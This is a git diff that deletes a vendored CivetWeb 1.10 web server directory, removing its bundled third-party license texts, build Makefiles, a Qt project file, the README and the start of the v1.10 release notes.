-> OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-> THE SOFTWARE.
-
-
-SQLite3 License
-------
-
-### Included only if built with Lua and SQLite support.
-
-http://www.sqlite.org/copyright.html
-
-> 2001 September 15
->
-> The author disclaims copyright to this source code.  In place of
-> a legal notice, here is a blessing:
->
->    May you do good and not evil.
->    May you find forgiveness for yourself and forgive others.
->    May you share freely, never taking more than you give.
-
-
-lsqlite3 License
-------
-
-### Included only if built with Lua and SQLite support.
-
-> Copyright (C) 2002-2013 Tiago Dionizio, Doug Currie
-> All rights reserved.
-> Author    : Tiago Dionizio <tiago.dionizio@ist.utl.pt>
-> Author    : Doug Currie <doug.currie@alum.mit.edu>
-> Library   : lsqlite3 - a SQLite 3 database binding for Lua 5
->
-> Permission is hereby granted, free of charge, to any person obtaining a copy
-> of this software and associated documentation files (the "Software"), to deal
-> in the Software without restriction, including without limitation the rights
-> to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-> copies of the Software, and to permit persons to whom the Software is
-> furnished to do so, subject to the following conditions:
->
-> The above copyright notice and this permission notice shall be included in
-> all copies or substantial portions of the Software.
->
-> THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-> IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-> FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-> AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-> LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-> OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-> THE SOFTWARE.
-
-
-Lua File System License
-------
-
-### Included only if built with Lua support.
-
-http://keplerproject.github.io/luafilesystem/license.html
-
-> Copyright © 2003 Kepler Project.
->
-> Permission is hereby granted, free of charge, to any person obtaining a copy
-> of this software and associated documentation files (the "Software"), to deal
-> in the Software without restriction, including without limitation the rights
-> to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-> copies of the Software, and to permit persons to whom the Software is
-> furnished to do so, subject to the following conditions:
->
-> The above copyright notice and this permission notice shall be included in
-> all copies or substantial portions of the Software.
->
-> THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-> IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-> FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-> AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-> LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-> OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-> THE SOFTWARE.
-
-
-LuaXML License
-------
-
-### Included only if built with Lua and LuaXML support.
-
-> LuaXML License
->
-> LuaXml is licensed under the terms of the MIT license reproduced below,
-> the same as Lua itself. This means that LuaXml is free software and can be
-> used for both academic and commercial purposes at absolutely no cost.
->
-> Copyright (C) 2007-2013 Gerald Franz, eludi.net
->
-> Permission is hereby granted, free of charge, to any person obtaining a copy
-> of this software and associated documentation files (the "Software"), to deal
-> in the Software without restriction, including without limitation the rights
-> to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-> copies of the Software, and to permit persons to whom the Software is
-> furnished to do so, subject to the following conditions:
->
-> The above copyright notice and this permission notice shall be included in
-> all copies or substantial portions of the Software.
->
-> THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-> IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-> FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.  IN NO EVENT SHALL THE
-> AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-> LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-> OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-> THE SOFTWARE.
-
-
-Duktape License
-------
-
-### Included only if built with Duktape support.
-
-https://github.com/svaarala/duktape/blob/master/LICENSE.txt
-
-> ===============
-> Duktape license
-> ===============
-> 
-> (http://opensource.org/licenses/MIT)
-> 
-> Copyright (c) 2013-2015 by Duktape authors (see AUTHORS.rst)
->
-> Permission is hereby granted, free of charge, to any person obtaining a copy
-> of this software and associated documentation files (the "Software"), to deal
-> in the Software without restriction, including without limitation the rights
-> to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-> copies of the Software, and to permit persons to whom the Software is
-> furnished to do so, subject to the following conditions:
->
-> The above copyright notice and this permission notice shall be included in
-> all copies or substantial portions of the Software.
->
-> THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-> IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-> FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-> AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-> LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-> OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-> THE SOFTWARE.
-
diff --git a/thirdparty/civetweb-1.10/Makefile.deprecated b/thirdparty/civetweb-1.10/Makefile.deprecated
deleted file mode 100644
index 288c15b..0000000
--- a/thirdparty/civetweb-1.10/Makefile.deprecated
+++ /dev/null
@@ -1,208 +0,0 @@
-# This Makefile is part of Civetweb web server project,
-# https://github.com/valenok/civetweb
-#
-# Example custom build:
-# COPT="-g -O0 -DNO_SSL_DL -DUSE_LUA -llua -lcrypto -lssl" make linux
-#
-# Flags are:
-# -DHAVE_MD5              - use system md5 library (-2kb)
-# -DNDEBUG                - strip off all debug code (-5kb)
-# -DDEBUG                 - build debug version (very noisy) (+7kb)
-# -DNO_CGI                - disable CGI support (-5kb)
-# -DNO_SSL                - disable SSL functionality (-2kb)
-# -DNO_SSL_DL             - link against system libssl library (-1kb)
-# -DCONFIG_FILE=\"file\"  - use `file' as the default config file
-# -DSSL_LIB=\"libssl.so.<version>\"   - use system versioned SSL shared object
-# -DCRYPTO_LIB=\"libcrypto.so.<version>\" - use system versioned CRYPTO so
-# -DUSE_LUA               - embed Lua in Civetweb (+100kb)
-
-PROG        = civetweb
-CFLAGS      = -std=c99 -O2 -W -Wall -pedantic -pthread -pipe -Iinclude $(COPT)
-
-# To build with Lua, download and unzip Lua 5.2.3 source code into the
-# civetweb directory, and then add $(LUA_SOURCES) to CFLAGS
-LUA         = src/third_party/lua-5.2.3/src
-LUA_FLAGS   = -I$(LUA) -DLUA_COMPAT_ALL
-LUA_SOURCES = $(LUA)/lapi.c $(LUA)/lcode.c $(LUA)/lctype.c \
-              $(LUA)/ldebug.c $(LUA)/ldo.c $(LUA)/ldump.c \
-              $(LUA)/lfunc.c $(LUA)/lgc.c $(LUA)/llex.c \
-              $(LUA)/lmem.c $(LUA)/lobject.c $(LUA)/lopcodes.c \
-              $(LUA)/lparser.c $(LUA)/lstate.c $(LUA)/lstring.c \
-              $(LUA)/ltable.c $(LUA)/ltm.c $(LUA)/lundump.c \
-              $(LUA)/lvm.c $(LUA)/lzio.c $(LUA)/lauxlib.c \
-              $(LUA)/lbaselib.c $(LUA)/lbitlib.c $(LUA)/lcorolib.c \
-              $(LUA)/ldblib.c $(LUA)/liolib.c $(LUA)/lmathlib.c \
-              $(LUA)/loslib.c $(LUA)/lstrlib.c $(LUA)/ltablib.c \
-              $(LUA)/loadlib.c $(LUA)/linit.c
-LUA_WINOBJS = $(LUA_SOURCES:%.c=%.obj)
-
-ifneq ($(OS), Windows_NT)
-  LUA_FLAGS += -DLUA_USE_DLOPEN
-endif
-
-LIB_SOURCES = src/civetweb.c
-
-ALL_SOURCES = src/main.c $(LIB_SOURCES) src/third_party/sqlite3.c src/third_party/lsqlite3.c src/third_party/lfs.c \
-              $(LUA_SOURCES) $(YASSL_SOURCES)
-
-SQLITE_FLAGS = -DTHREADSAFE=1 -DSQLITE_ENABLE_FTS3 -DSQLITE_ENABLE_FTS3_PARENTHESIS
-CIVETWEB_FLAGS = -DUSE_LUA -DUSE_LUA_SQLITE3 -DUSE_LUA_FILE_SYSTEM $(COPT)
-FLAGS = $(CIVETWEB_FLAGS) $(SQLITE_FLAGS) $(LUA_FLAGS)
-
-
-# Stock windows binary builds with Lua. 
-# Yassl has a GPL license, so we will leave it out by default.
-
-ifeq ($(WITH_YASSL), 1)
-YASSL       = ../cyassl-2.4.6
-YASSL_FLAGS = -I $(YASSL) -I $(YASSL)/cyassl \
-              -D _LIB -D OPENSSL_EXTRA -D HAVE_ERRNO_H \
-              -D HAVE_GETHOSTBYNAME -D HAVE_INET_NTOA -D HAVE_LIMITS_H \
-              -D HAVE_MEMSET -D HAVE_SOCKET -D HAVE_STDDEF_H -D HAVE_STDLIB_H \
-              -D HAVE_STRING_H -D HAVE_SYS_STAT_H -D HAVE_SYS_TYPES_H
-YASSL_SOURCES = \
-  $(YASSL)/src/internal.c $(YASSL)/src/io.c $(YASSL)/src/keys.c \
-  $(YASSL)/src/ssl.c $(YASSL)/src/tls.c $(YASSL)/ctaocrypt/src/hmac.c \
-  $(YASSL)/ctaocrypt/src/random.c $(YASSL)/ctaocrypt/src/sha.c \
-  $(YASSL)/ctaocrypt/src/sha256.c $(YASSL)/ctaocrypt/src/logging.c \
-  $(YASSL)/ctaocrypt/src/error.c $(YASSL)/ctaocrypt/src/rsa.c \
-  $(YASSL)/ctaocrypt/src/des3.c $(YASSL)/ctaocrypt/src/asn.c \
-  $(YASSL)/ctaocrypt/src/coding.c $(YASSL)/ctaocrypt/src/arc4.c \
-  $(YASSL)/ctaocrypt/src/md4.c $(YASSL)/ctaocrypt/src/md5.c \
-  $(YASSL)/ctaocrypt/src/dh.c $(YASSL)/ctaocrypt/src/dsa.c \
-  $(YASSL)/ctaocrypt/src/pwdbased.c $(YASSL)/ctaocrypt/src/aes.c \
-  $(YASSL)/ctaocrypt/src/md2.c $(YASSL)/ctaocrypt/src/ripemd.c \
-  $(YASSL)/ctaocrypt/src/sha512.c $(YASSL)/src/sniffer.c \
-  $(YASSL)/ctaocrypt/src/rabbit.c $(YASSL)/ctaocrypt/src/misc.c \
-  $(YASSL)/ctaocrypt/src/tfm.c $(YASSL)/ctaocrypt/src/integer.c \
-  $(YASSL)/ctaocrypt/src/ecc.c $(YASSL)/src/ocsp.c $(YASSL)/src/crl.c \
-  $(YASSL)/ctaocrypt/src/hc128.c $(YASSL)/ctaocrypt/src/memory.c
-  
-  ALL_SOURCES += $(YASSL_SOURCES)
-  FLAGS += $(YASSL_FLAGS) -DNO_SSL_DL
-  CIVETWEB_FLAGS += -DNO_SSL_DL 
-
-else
-#  FLAGS += -DNO_SSL
-#  CIVETWEB_FLAGS += -DNO_SSL 
-endif
-
-ALL_OBJECTS = $(ALL_SOURCES:%.c=%.o)
-ALL_WINOBJS = $(ALL_SOURCES:%.c=%.obj)
-
-
-# Using Visual Studio 6.0. To build Civetweb:
-#  Set MSVC variable below to where VS 6.0 is installed on your system
-#  Run "PATH_TO_VC6\bin\nmake windows"
-MSVC = ../vc6
-#DBG = /Zi /Od
-DBG  = /DNDEBUG /O1
-CL   = $(MSVC)/bin/cl /MD /TC /nologo $(DBG) /W3 /GA /I$(MSVC)/include
-LINK = $(MSVC)/bin/link /incremental:no /libpath:$(MSVC)/lib /machine:IX86 \
-       user32.lib shell32.lib comdlg32.lib ws2_32.lib advapi32.lib
-
-all:
-	@echo "make (linux|bsd|solaris|mac|windows|mingw|cygwin)"
-
-%.obj: %.c
-	$(CL) /c $(FLAGS) /Fo$@ $<
-
-%.o: %.c
-	$(CC) -o $@ $< -c $(FLAGS) $(CFLAGS)
-
-# Lua library for Windows
-lua.lib: $(LUA_WINOBJS)
-	$(MSVC)/bin/lib /out:$@ $(LUA_WINOBJS)
-
-# To build with Lua, make sure you have Lua unpacked into src/third_party/lua-5.2.3 directory
-linux_lua: $(ALL_OBJECTS)
-	$(CC) $(ALL_OBJECTS) -o $(PROG) -ldl
-
-civetweb.o: src/mod_lua.inl
-
-# Make sure that the compiler flags come last in the compilation string.
-# If not so, this can break some on some Linux distros which use
-# "-Wl,--as-needed" turned on by default  in cc command.
-# Also, this is turned in many other distros in static linkage builds.
-linux:
-	$(CC) $(LIB_SOURCES) src/main.c -o $(PROG) -ldl $(CFLAGS)
-
-mac: bsd
-bsd:
-	$(CC) $(LIB_SOURCES) src/main.c -o $(PROG) $(CFLAGS)
-
-bsd_lua: $(ALL_OBJECTS)
-	$(CC) $(ALL_OBJECTS) -o $@
-
-solaris:
-	$(CC) $(LIB_SOURCES) src/main.c -lnsl -lsocket -o $(PROG) $(CFLAGS)
-
-lib$(PROG).a: $(ALL_OBJECTS)
-	ar cr $@ $(ALL_OBJECTS)
-
-$(PROG).lib: $(ALL_WINOBJS)
-	$(MSVC)/bin/lib /out:$@ $(ALL_WINOBJS)
-
-# For codesign to work in non-interactive mode, unlock login keychain:
-# security unlock ~/Library/Keychains/login.keychain
-# See e.g. http://lists.apple.com/archives/apple-cdsa/2008/Jan/msg00027.html
-Civetweb: $(LIB_SOURCES) src/main.c
-	$(CC) $(LIB_SOURCES) src/main.c src/third_party/lsqlite3.c src/third_party/sqlite3.c src/third_party/lfs.c \
-          -DUSE_COCOA $(CFLAGS) $(FLAGS) -mmacosx-version-min=10.4 \
-          $(YASSL_SOURCES) $(LUA_SOURCES) \
-          -framework Cocoa -ObjC -arch i386 -arch x86_64 -o Civetweb
-
-cocoa: Civetweb
-	V=`perl -lne '/define\s+CIVETWEB_VERSION\s+"(\S+)"/ and print $$1' include/civetweb.h`; DIR=dmg/Civetweb.app && rm -rf $$DIR && mkdir -p $$DIR/Contents/{MacOS,Resources} && install -m 644 resources/civetweb_*.png resources/civetweb.icns $$DIR/Contents/Resources/ && install -m 644 resources/Info.plist $$DIR/Contents/ && install -m 755 Civetweb $$DIR/Contents/MacOS/ && ln -fs /Applications dmg/ ; hdiutil create Civetweb_$$V.dmg -volname "Civetweb $$V" -srcfolder dmg -ov #; rm -rf dmg
-
-un:
-	$(CC) test/unit_test.c -o unit_test -I. -I$(LUA) $(LUA_SOURCES) \
-          $(CFLAGS) -g -O0
-	./unit_test
-
-wi:
-	$(CL) test/unit_test.c $(LUA_SOURCES) $(LUA_FLAGS) \
-          $(YASSL_SOURCES) $(YASSL_FLAGS) /I. /DNO_SSL_DL \
-          /link /libpath:$(MSVC)/lib advapi32.lib /out:unit_test.exe
-	./unit_test.exe
-
-windows: $(ALL_WINOBJS)
-	$(MSVC)/bin/rc resources/res.rc
-	$(LINK) /nologo $(ALL_WINOBJS) resources/res.res /out:$(PROG).exe
-
-# Build for Windows under MinGW
-#MINGWDBG= -DDEBUG -O0 -ggdb
-MINGWDBG= -DNDEBUG -Os
-MINGWOPT=  -W -Wall -mthreads -Wl,--subsystem,console $(MINGWDBG) -DHAVE_STDINT $(GCC_WARNINGS) $(COPT)
-mingw:
-	windres resources\res.rc resources\res.o
-	$(CC) $(MINGWOPT) $(LIB_SOURCES) -lws2_32 \
-		-shared -Wl,--out-implib=$(PROG).lib -o $(PROG).dll
-	$(CC) $(MINGWOPT) $(LIB_SOURCES) src/main.c resources\res.o \
-	-lws2_32 -ladvapi32 -lcomdlg32 -o $(PROG).exe
-
-# Build for Windows under Cygwin
-#CYGWINDBG= -DDEBUG -O0 -ggdb
-CYGWINDBG= -DNDEBUG -Os
-CYGWINOPT=  -W -Wall -mthreads -Wl,--subsystem,console $(CYGWINDBG) -DHAVE_STDINT $(GCC_WARNINGS) $(COPT)
-cygwin:
-	windres ./resources/res.rc ./resources/res.o
-	$(CC) $(CYGWINOPT) $(LIB_SOURCES) -lws2_32 \
-		-shared -Wl,--out-implib=$(PROG).lib -o $(PROG).dll
-	$(CC) $(CYGWINOPT) -Iinclude $(LIB_SOURCES) src/main.c ./resources/res.o \
-	-lws2_32 -ladvapi32 -o $(PROG).exe
-
-tests:
-	perl test/test.pl $(TEST)
-
-tarball: clean
-	F=civetweb-`perl -lne '/define\s+CIVETWEB_VERSION\s+"(\S+)"/ and print $$1' include/civetweb.h`.tgz ; cd .. && tar -czf x civetweb/{LICENSE.md,Makefile,examples,test,resources,*.[ch],*.md} && mv x civetweb/$$F
-
-release: tarball cocoa
-	wine make windows
-	V=`perl -lne '/define\s+CIVETWEB_VERSION\s+"(\S+)"/ and print $$1' include/civetweb.h`; upx civetweb.exe; cp civetweb.exe civetweb-$$V.exe; cp civetweb.exe civetweb_php_bundle/; zip -r civetweb_php_bundle_$$V.zip civetweb_php_bundle/
-
-clean:
-	rm -rf *.o *.core $(PROG) *.obj *.so $(PROG).txt *.dSYM *.tgz \
-	$(PROG).exe *.dll *.lib resources/res.o resources/res.RES *.dSYM *.zip *.pdb \
-	*.exe *.dmg $(ALL_OBJECTS) $(ALL_WINOBJS)
diff --git a/thirdparty/civetweb-1.10/Makefile.osx b/thirdparty/civetweb-1.10/Makefile.osx
deleted file mode 100644
index 44260e8..0000000
--- a/thirdparty/civetweb-1.10/Makefile.osx
+++ /dev/null
@@ -1,42 +0,0 @@
-# 
-# Copyright (c) 2013 No Face Press, LLC
-# License http://opensource.org/licenses/mit-license.php MIT License
-#
-
-# For codesign to work in non-interactive mode, unlock login keychain:
-# security unlock ~/Library/Keychains/login.keychain
-# See e.g. http://lists.apple.com/archives/apple-cdsa/2008/Jan/msg00027.html
-
-# Civetweb features
-WITH_LUA = 1
-
-PACKAGE = Civetweb
-BUILD_DIR = out
-
-CFLAGS += -DUSE_COCOA -DENABLE_CREATE_CONFIG_FILE -mmacosx-version-min=10.4 -ObjC -arch i386 -arch x86_64
-LDFLAGS += -framework Cocoa
-
-DMG_DIR = $(BUILD_DIR)/dmg
-CONTENTS_DIR = $(DMG_DIR)/$(PACKAGE).app/Contents
-RESOURCES_DIR = $(CONTENTS_DIR)/Resources
-OSXBIN_DIR = $(CONTENTS_DIR)/MacOS
-
-CIVETWEB_VERSION = $(shell perl -lne '/define\s+CIVETWEB_VERSION\s+"(\S+)"/ and print $$1' include/civetweb.h)
-ZIPFILENAME = $(PACKAGE)-$(CIVETWEB_VERSION).zip
-
-include Makefile
-
-package: build
-	@rm -rf $(DMG_DIR)
-	install -d -m 755 $(CONTENTS_DIR) $(RESOURCES_DIR) $(OSXBIN_DIR)
-	install -m 644 resources/Info.plist $(CONTENTS_DIR)/
-	install -m 644 resources/civetweb_*.png resources/civetweb.icns $(RESOURCES_DIR)/
-	install -m 644 resources/itworks.html $(OSXBIN_DIR)/index.html
-	install -m 644 resources/civetweb_64x64.png $(OSXBIN_DIR)/
-	install -m 755 $(CPROG) $(OSXBIN_DIR)/$(PACKAGE)
-	install -m 644 docs/Installing.md $(DMG_DIR)/Installing.txt
-	install -m 644 LICENSE.md $(DMG_DIR)/License.txt
-	rm -rf $(ZIPFILENAME)
-	cd $(DMG_DIR) && zip -r ../../$(ZIPFILENAME) .
-
-.PHONY: package
diff --git a/thirdparty/civetweb-1.10/Qt/CivetWeb.pro b/thirdparty/civetweb-1.10/Qt/CivetWeb.pro
deleted file mode 100644
index 6d5e1a2..0000000
--- a/thirdparty/civetweb-1.10/Qt/CivetWeb.pro
+++ /dev/null
@@ -1,34 +0,0 @@
-TEMPLATE = app
-CONFIG += console
-CONFIG -= app_bundle
-CONFIG -= qt
-
-SOURCES += \
-    ../src/md5.inl \
-    ../src/sha1.inl \
-    ../src/handle_form.inl \
-    ../src/mod_lua.inl \
-    ../src/mod_duktape.inl \
-    ../src/timer.inl \
-    ../src/civetweb.c \
-    ../src/main.c
-
-#include(deployment.pri)
-#qtcAddDeployment()
-
-HEADERS += \
-    ../include/civetweb.h
-
-INCLUDEPATH +=  \
-    ../include/
-
-win32 {
-LIBS += -lws2_32 -lComdlg32 -lUser32 -lShell32 -lAdvapi32
-} else {
-LIBS += -lpthread -ldl -lm
-}
-
-
-DEFINES += USE_IPV6
-DEFINES += USE_WEBSOCKET
-DEFINES += USE_SERVER_STATS
diff --git a/thirdparty/civetweb-1.10/README.md b/thirdparty/civetweb-1.10/README.md
deleted file mode 100644
index 4a334ca..0000000
--- a/thirdparty/civetweb-1.10/README.md
+++ /dev/null
@@ -1,168 +0,0 @@
-![CivetWeb](https://raw.githubusercontent.com/civetweb/civetweb/master/resources/civetweb_64x64.png "CivetWeb") CivetWeb
-=======
-
-**The official home of CivetWeb is [https://github.com/civetweb/civetweb](https://github.com/civetweb/civetweb)**
-
-[![License](https://img.shields.io/badge/license-MIT-blue.svg)](https://opensource.org/licenses/MIT)
-[![GitHub contributors](https://img.shields.io/github/contributors/civetweb/civetweb.svg)](https://github.com/civetweb/civetweb/blob/master/CREDITS.md)
-
-Continuous integration for Linux and OSX ([Travis CI](https://travis-ci.org/civetweb/civetweb)):
-
-[![Travis Build Status](https://travis-ci.org/civetweb/civetweb.svg?branch=master)](https://travis-ci.org/civetweb/civetweb)
-
-Continuous integration for Windows ([AppVeyor](https://ci.appveyor.com/project/civetweb/civetweb)):
-
-[![Appveyor Build Status](https://ci.appveyor.com/api/projects/status/github/civetweb/civetweb?svg=true)](https://ci.appveyor.com/project/civetweb/civetweb/branch/master)
-
-Test coverage check ([coveralls](https://coveralls.io/github/civetweb/civetweb), [codecov](https://codecov.io/gh/civetweb/civetweb/branch/master)) (currently in a setup and evaluation phase):
-
-[![Coveralls](https://img.shields.io/coveralls/civetweb/civetweb.svg?maxAge=3600)]()
-[![Coverage Status](https://coveralls.io/repos/github/civetweb/civetweb/badge.svg?branch=master)](https://coveralls.io/github/civetweb/civetweb?branch=master)
-
-[![codecov](https://codecov.io/gh/civetweb/civetweb/branch/master/graph/badge.svg)](https://codecov.io/gh/civetweb/civetweb)
-
-
-
-Static source code analysis ([Coverity](https://scan.coverity.com/projects/5784)):
-
-[![Coverity Scan Build Status](https://scan.coverity.com/projects/5784/badge.svg)](https://scan.coverity.com/projects/5784)
-
-
-
-Project Mission
------------------
-
-Project mission is to provide easy to use, powerful, C/C++ embeddable web
-server with optional CGI, SSL and Lua support.
-CivetWeb has a MIT license so you can innovate without restrictions.
-
-CivetWeb can be used by developers as a library, to add web server functionality to an existing application.
-It can also be used by end users as a stand-alone web server. It is available as single executable, no installation is required.
-
-
-Where to find the official version?
------------------------------------
-
-End users can download CivetWeb releases at SourceForge
-[https://sourceforge.net/projects/civetweb/](https://sourceforge.net/projects/civetweb/)
-
-Developers can contribute to CivetWeb via GitHub
-[https://github.com/civetweb/civetweb](https://github.com/civetweb/civetweb)
-
-Trouble tickets should be filed on GitHub
-[https://github.com/civetweb/civetweb/issues](https://github.com/civetweb/civetweb/issues)
-
-Announcements are at Google Groups
-[https://groups.google.com/d/forum/civetweb](https://groups.google.com/d/forum/civetweb). Some older support and discussion threads are there as well. However, recently support questions and discussions are usually [GitHub issues](https://github.com/civetweb/civetweb/issues).
-
-Source releases can be found on GitHub
-[https://github.com/civetweb/civetweb/releases](https://github.com/civetweb/civetweb/releases)
-
-A very brief overview can be found on GitHub Pages
-[http://civetweb.github.io/civetweb/](http://civetweb.github.io/civetweb/)
-
-
-Quick start documentation
---------------------------
-
-- [docs/Installing.md](https://github.com/civetweb/civetweb/blob/master/docs/Installing.md) - Install Guide (for end users using pre-built binaries)
-- [docs/UserManual.md](https://github.com/civetweb/civetweb/blob/master/docs/UserManual.md) - End User Guide
-- [docs/Building.md](https://github.com/civetweb/civetweb/blob/master/docs/Building.md) - Building the Server (quick start guide)
-- [docs/Embedding.md](https://github.com/civetweb/civetweb/blob/master/docs/Embedding.md) - Embedding (how to add HTTP support to an existing application)
-- [docs/OpenSSL.md](https://github.com/civetweb/civetweb/blob/master/docs/OpenSSL.md) - Adding HTTPS (SSL/TLS) support using OpenSSL.
-- [API documentation](https://github.com/civetweb/civetweb/tree/master/docs/api) - Additional documentation on the civetweb application programming interface ([civetweb.h](https://github.com/civetweb/civetweb/blob/master/include/civetweb.h)).
-- [RELEASE_NOTES.md](https://github.com/civetweb/civetweb/blob/master/RELEASE_NOTES.md) - Release Notes
-- [LICENSE.md](https://github.com/civetweb/civetweb/blob/master/LICENSE.md) - Copyright License
-
-
-Overview
---------
-
-CivetWeb keeps the balance between functionality and
-simplicity by a carefully selected list of features:
-
-- Liberal, commercial-friendly, permissive,
-  [MIT license](http://en.wikipedia.org/wiki/MIT_License)
-- Free from copy-left licenses, like GPL, because you should innovate without
-  restrictions.
-- Forked from [Mongoose](https://code.google.com/p/mongoose/) in 2013, before
-  it changed the licence from MIT to commercial + GPL. A lot of enchancements
-  have been added since that time, see
-  [RELEASE_NOTES.md](https://github.com/civetweb/civetweb/blob/master/RELEASE_NOTES.md).
-- Works on Windows, Mac, Linux, UNIX, iPhone, Android, Buildroot, and many
-  other platforms.
-- Scripting and database support (Lua scipts, Lua Server Pages, CGI + SQLite
-  database, Server side javascript).
-  This provides a ready to go, powerful web development platform in a one
-  single-click executable with **no dependencies**.
-- Support for CGI, HTTPS (SSL/TLS), SSI, HTTP digest (MD5) authorization, Websocket,
-  WEbDAV.
-- Optional support for authentication using client side X.509 certificates.
-- Resumed download, URL rewrite, file blacklist, IP-based ACL, Windows service.
-- Download speed limit based on client subnet or URI pattern.
-- Simple and clean embedding API.
-- The source is in single file to make things easy.
-- Embedding examples included.
-- HTTP client capable of sending arbitrary HTTP/HTTPS requests.
-- Websocket client functionality available (WS/WSS).
-
-
-### Optionally included software
-
-[![Lua](https://raw.githubusercontent.com/civetweb/civetweb/master/resources/lua-logo.jpg "Lua Logo")](http://lua.org)
-
-[![Sqlite3](https://raw.githubusercontent.com/civetweb/civetweb/master/resources/sqlite3-logo.jpg "Sqlite3 Logo")](http://sqlite.org)
-
-[![LuaFileSystem](https://raw.githubusercontent.com/civetweb/civetweb/master/resources/luafilesystem-logo.jpg "LuaFileSystem Logo")](http://keplerproject.github.io/luafilesystem/)
-
-[![LuaSQLite3](https://raw.githubusercontent.com/civetweb/civetweb/master/resources/luasqlite-logo.jpg "LuaSQLite3 Logo")](http://lua.sqlite.org/index.cgi/index)
-
-[![LuaXML](https://raw.githubusercontent.com/civetweb/civetweb/master/resources/luaxml-logo.jpg "LuaXML Logo")](http://viremo.eludi.net/LuaXML/index.html)
-
-[![Duktape](https://raw.githubusercontent.com/civetweb/civetweb/master/resources/duktape-logo.png "Duktape Logo")](http://duktape.org)
-
-
-Support
--------
-
-This project is very easy to install and use. 
-Please read the [documentation](https://github.com/civetweb/civetweb/blob/master/docs/)
-and have a look at the [examples](https://github.com/civetweb/civetweb/blob/master/examples/).
-More information may be found on the [mailing list](https://groups.google.com/d/forum/civetweb).
-
-Note: I do not take any liability or warranty for any linked contents.  Visit these pages and try the community support suggestions at your own risk.
-
-
-Contributions
----------------
-
-Contributions are welcome provided all contributions carry the MIT license.
-
-DO NOT APPLY fixes copied from Mongoose to this project to prevent GPL tainting.
-Since 2013, CivetWeb and Mongoose are developed independently.
-By now the code base differs, so patches cannot be safely transfered in either direction.
-
-Some guidelines can be found in [docs/Contribution.md](https://github.com/civetweb/civetweb/blob/master/docs/Contribution.md).
-
-
-### Authors
-
-CivetWeb is based on the Mongoose project.  The original author of Mongoose was
-Sergey Lyubka (Copyright (c) 2004-2013 Sergey Lyubka, MIT license).
-
-However, in August 16, 2013, the [license of Mongoose has been changed](https://groups.google.com/forum/#!topic/mongoose-users/aafbOnHonkI)
-after writing and distributing the original code this project is based on.
-The license change and CivetWeb used to be mentioned on the Mongoose
-[Wikipedia](https://en.wikipedia.org/wiki/Mongoose_(web_server))
-page as well, but it's getting deleted (and added again) there every
-now and then.
-
-CivetWeb has been forked from the last MIT version of Mongoose.
-Since 2013, CivetWeb has seen many improvements from various authors
-(Copyright (c) 2013-2017 the CivetWeb developers, MIT license).
-A list of authors can be found in [CREDITS.md](https://github.com/civetweb/civetweb/blob/master/CREDITS.md).
-
-Using the CivetWeb project ensures the MIT licenses terms are applied and
-GPL cannot be imposed on any of this code, as long as it is sourced from
-here. This code will remain free with the MIT license protection.
-
diff --git a/thirdparty/civetweb-1.10/RELEASE_NOTES.md b/thirdparty/civetweb-1.10/RELEASE_NOTES.md
deleted file mode 100644
index dfae89f..0000000
--- a/thirdparty/civetweb-1.10/RELEASE_NOTES.md
+++ /dev/null
@@ -1,395 +0,0 @@
-Release Notes v1.10
-===
-### Objectives: *OpenSSL 1.1 support, add server statistics and diagnostic data*
-
-Changes
--------
-
-- Add missing `mg_` or `MG_` to symbols in civetweb.h. Symbols without will be removed a future version.
-- Add HTTPS server configuration example
-- Lua Pages: mg.include should support absolute, relative and virtual path types
-- Add API function for HTTP digest authentication
-- Improved interface documentation
-- Support parameters for Lua background scripts
-- Use new connection queue implementation (previously ALTERNATIVE\_QUEUE) as default
-- Add USE\_SERVER\_STATS define, so the server collects statistics data
-- Convert system\_info text output and all other diagnostic strings to JSON format
-- Add experimental function to query the connection status (may be dropped again)
-- Add document on proposed future interface changes (for comments)
-- Officially drop Symbian support
-- Ignore leading blank lines in multipart messages (for Android upload service)
-- Rewrite some functions, in particular request parsing
-- CORS preflight directly in the server, with additional config options
-- Solve some warnings from different static source code analysis tools
-- Collect server status data
-- Allow hostname in listening\_ports
-- Make maximum request size configurable
